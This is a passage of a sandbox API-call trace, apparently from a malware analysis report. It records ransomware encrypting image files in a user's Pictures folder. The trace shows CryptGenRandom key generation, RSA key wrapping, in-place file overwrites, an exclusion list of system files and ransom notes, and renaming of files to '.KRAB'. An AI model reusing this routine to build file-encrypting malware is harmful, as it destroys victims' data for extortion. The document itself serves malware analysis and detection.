phKey=0x338eeb0*=0xfbd3e0) returned 1 [0097.509] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0097.509] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0097.509] GetLastError () returned 0x0 [0097.509] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0097.509] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0097.509] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\JOb0TwYbdocjGXq.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\job0twybdocjgxq.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0097.510] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0097.510] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0097.510] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0x15318, lpOverlapped=0x0) returned 1 [0097.522] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xfffeace8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.522] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x15318, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0x15318, lpOverlapped=0x0) returned 1 [0097.522] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0097.522] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.525] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.526] CloseHandle (hObject=0x3a8) returned 1 [0097.526] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.526] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\JOb0TwYbdocjGXq.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\job0twybdocjgxq.gif"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\JOb0TwYbdocjGXq.gif.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\job0twybdocjgxq.gif.krab")) returned 1 [0097.527] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.527] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0097.527] lstrcmpW (lpString1="JW74pdf7vQ.gif", lpString2=".") returned 1 [0097.527] lstrcmpW (lpString1="JW74pdf7vQ.gif", lpString2="..") returned 1 [0097.527] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\", lpString2="JW74pdf7vQ.gif" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\JW74pdf7vQ.gif") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\JW74pdf7vQ.gif" [0097.527] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.527] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\JW74pdf7vQ.gif.KRAB") returned 70 [0097.527] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\JW74pdf7vQ.gif") returned 65 [0097.527] lstrlenW (lpString=".gif") returned 4 [0097.527] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.527] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".gif ") returned 5 [0097.527] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.528] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\JW74pdf7vQ.gif") returned 65 [0097.528] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\JW74pdf7vQ.gif") returned 65 [0097.528] lstrcmpiW (lpString1="JW74pdf7vQ.gif", lpString2="desktop.ini") returned 1 [0097.528] lstrcmpiW (lpString1="JW74pdf7vQ.gif", lpString2="autorun.inf") returned 1 [0097.528] lstrcmpiW (lpString1="JW74pdf7vQ.gif", lpString2="ntuser.dat") returned -1 [0097.528] lstrcmpiW (lpString1="JW74pdf7vQ.gif", lpString2="iconcache.db") returned 1 [0097.528] lstrcmpiW (lpString1="JW74pdf7vQ.gif", lpString2="bootsect.bak") returned 1 [0097.528] lstrcmpiW (lpString1="JW74pdf7vQ.gif", lpString2="boot.ini") returned 1 [0097.528] lstrcmpiW (lpString1="JW74pdf7vQ.gif", lpString2="ntuser.dat.log") returned -1 [0097.528] lstrcmpiW (lpString1="JW74pdf7vQ.gif", lpString2="thumbs.db") returned -1 [0097.528] lstrcmpiW (lpString1="JW74pdf7vQ.gif", lpString2="KRAB-DECRYPT.html") returned -1 [0097.528] lstrcmpiW (lpString1="JW74pdf7vQ.gif", lpString2="KRAB-DECRYPT.txt") returned -1 [0097.528] lstrcmpiW (lpString1="JW74pdf7vQ.gif", lpString2="CRAB-DECRYPT.txt") returned 1 [0097.528] lstrcmpiW (lpString1="JW74pdf7vQ.gif", lpString2="ntldr") returned -1 [0097.528] lstrcmpiW (lpString1="JW74pdf7vQ.gif", lpString2="NTDETECT.COM") returned -1 [0097.528] lstrcmpiW (lpString1="JW74pdf7vQ.gif", lpString2="Bootfont.bin") returned 1 [0097.528] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.528] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011678) returned 1 [0097.528] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.529] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.529] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.529] CryptGenRandom (in: hProv=0x1011678, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0097.529] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0097.529] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.529] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010df8) returned 1 [0097.529] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.530] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.530] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.530] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0097.530] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.530] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.530] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1010df8) returned 1 [0097.530] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd3e0) returned 1 [0097.530] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0097.531] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0097.531] GetLastError () returned 0x0 [0097.531] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0097.531] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.531] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1010df8) returned 1 [0097.531] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd5a0) returned 1 [0097.531] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0097.531] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0097.531] GetLastError () returned 0x0 [0097.531] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0097.531] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.531] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\JW74pdf7vQ.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\jw74pdf7vq.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0097.532] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0097.532] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0097.533] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0xb347, lpOverlapped=0x0) returned 1 [0097.542] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xffff4cb9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.542] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xb347, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0xb347, lpOverlapped=0x0) returned 1 [0097.542] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0097.542] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.545] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.546] CloseHandle (hObject=0x3a8) returned 1 [0097.546] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.546] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\JW74pdf7vQ.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\jw74pdf7vq.gif"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\JW74pdf7vQ.gif.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\jw74pdf7vq.gif.krab")) returned 1 [0097.546] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.547] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0097.547] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0097.547] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0097.547] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\KRAB-DECRYPT.txt" [0097.547] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.547] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\KRAB-DECRYPT.txt.KRAB") returned 72 [0097.547] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\KRAB-DECRYPT.txt") returned 67 [0097.547] lstrlenW (lpString=".txt") returned 4 [0097.547] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.547] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0097.547] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.548] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\KRAB-DECRYPT.txt") returned 67 [0097.548] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\KRAB-DECRYPT.txt") returned 67 [0097.548] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0097.548] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0097.548] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0097.548] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0097.548] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0097.548] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0097.548] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0097.548] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0097.548] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0097.548] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0097.548] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.548] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0097.548] lstrcmpW (lpString1="pwB0rFj60e.jpg", lpString2=".") returned 1 [0097.548] lstrcmpW (lpString1="pwB0rFj60e.jpg", lpString2="..") returned 1 [0097.548] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\", lpString2="pwB0rFj60e.jpg" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\pwB0rFj60e.jpg") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\pwB0rFj60e.jpg" [0097.548] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.548] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\pwB0rFj60e.jpg.KRAB") returned 70 [0097.548] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\pwB0rFj60e.jpg") returned 65 [0097.548] lstrlenW (lpString=".jpg") returned 4 [0097.548] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.549] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".jpg ") returned 5 [0097.549] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.549] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\pwB0rFj60e.jpg") returned 65 [0097.549] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\pwB0rFj60e.jpg") returned 65 [0097.549] lstrcmpiW (lpString1="pwB0rFj60e.jpg", lpString2="desktop.ini") returned 1 [0097.549] lstrcmpiW (lpString1="pwB0rFj60e.jpg", lpString2="autorun.inf") returned 1 [0097.549] lstrcmpiW (lpString1="pwB0rFj60e.jpg", lpString2="ntuser.dat") returned 1 [0097.549] lstrcmpiW (lpString1="pwB0rFj60e.jpg", lpString2="iconcache.db") returned 1 [0097.549] lstrcmpiW (lpString1="pwB0rFj60e.jpg", lpString2="bootsect.bak") returned 1 [0097.549] lstrcmpiW (lpString1="pwB0rFj60e.jpg", lpString2="boot.ini") returned 1 [0097.549] lstrcmpiW (lpString1="pwB0rFj60e.jpg", lpString2="ntuser.dat.log") returned 1 [0097.549] lstrcmpiW (lpString1="pwB0rFj60e.jpg", lpString2="thumbs.db") returned -1 [0097.549] lstrcmpiW (lpString1="pwB0rFj60e.jpg", lpString2="KRAB-DECRYPT.html") returned 1 [0097.549] lstrcmpiW (lpString1="pwB0rFj60e.jpg", lpString2="KRAB-DECRYPT.txt") returned 1 [0097.549] lstrcmpiW (lpString1="pwB0rFj60e.jpg", lpString2="CRAB-DECRYPT.txt") returned 1 [0097.549] lstrcmpiW (lpString1="pwB0rFj60e.jpg", lpString2="ntldr") returned 1 [0097.549] lstrcmpiW (lpString1="pwB0rFj60e.jpg", lpString2="NTDETECT.COM") returned 1 [0097.549] lstrcmpiW (lpString1="pwB0rFj60e.jpg", lpString2="Bootfont.bin") returned 1 [0097.549] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.549] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011018) returned 1 [0097.550] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.550] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.550] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.550] CryptGenRandom (in: hProv=0x1011018, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0097.550] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0097.550] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.550] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010df8) returned 1 [0097.551] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.551] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.551] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.551] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0097.551] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.551] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.552] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1011678) returned 1 [0097.552] CryptImportKey (in: hProv=0x1011678, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd5a0) returned 1 [0097.552] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0097.552] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0097.552] GetLastError () returned 0x0 [0097.552] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0097.552] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0097.552] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x10114e0) returned 1 [0097.553] CryptImportKey (in: hProv=0x10114e0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd3e0) returned 1 [0097.553] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0097.553] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0097.553] GetLastError () returned 0x0 [0097.553] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0097.553] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0097.553] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\pwB0rFj60e.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\pwb0rfj60e.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0097.553] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0097.554] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0097.554] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0x5032, lpOverlapped=0x0) returned 1 [0097.563] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xffffafce, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.563] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x5032, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0x5032, lpOverlapped=0x0) returned 1 [0097.563] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0097.563] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.567] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.567] CloseHandle (hObject=0x3a8) returned 1 [0097.567] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.567] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\pwB0rFj60e.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\pwb0rfj60e.jpg"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\pwB0rFj60e.jpg.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\pwb0rfj60e.jpg.krab")) returned 1 [0097.568] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.568] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0097.568] lstrcmpW (lpString1="S15WT4gPHEGLk.jpg", lpString2=".") returned 1 [0097.568] lstrcmpW (lpString1="S15WT4gPHEGLk.jpg", lpString2="..") returned 1 [0097.568] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\", lpString2="S15WT4gPHEGLk.jpg" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\S15WT4gPHEGLk.jpg") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\S15WT4gPHEGLk.jpg" [0097.568] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.568] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\S15WT4gPHEGLk.jpg.KRAB") returned 73 [0097.568] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\S15WT4gPHEGLk.jpg") returned 68 [0097.568] lstrlenW (lpString=".jpg") returned 4 [0097.569] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.569] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".jpg ") returned 5 [0097.569] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.569] lstrlenW 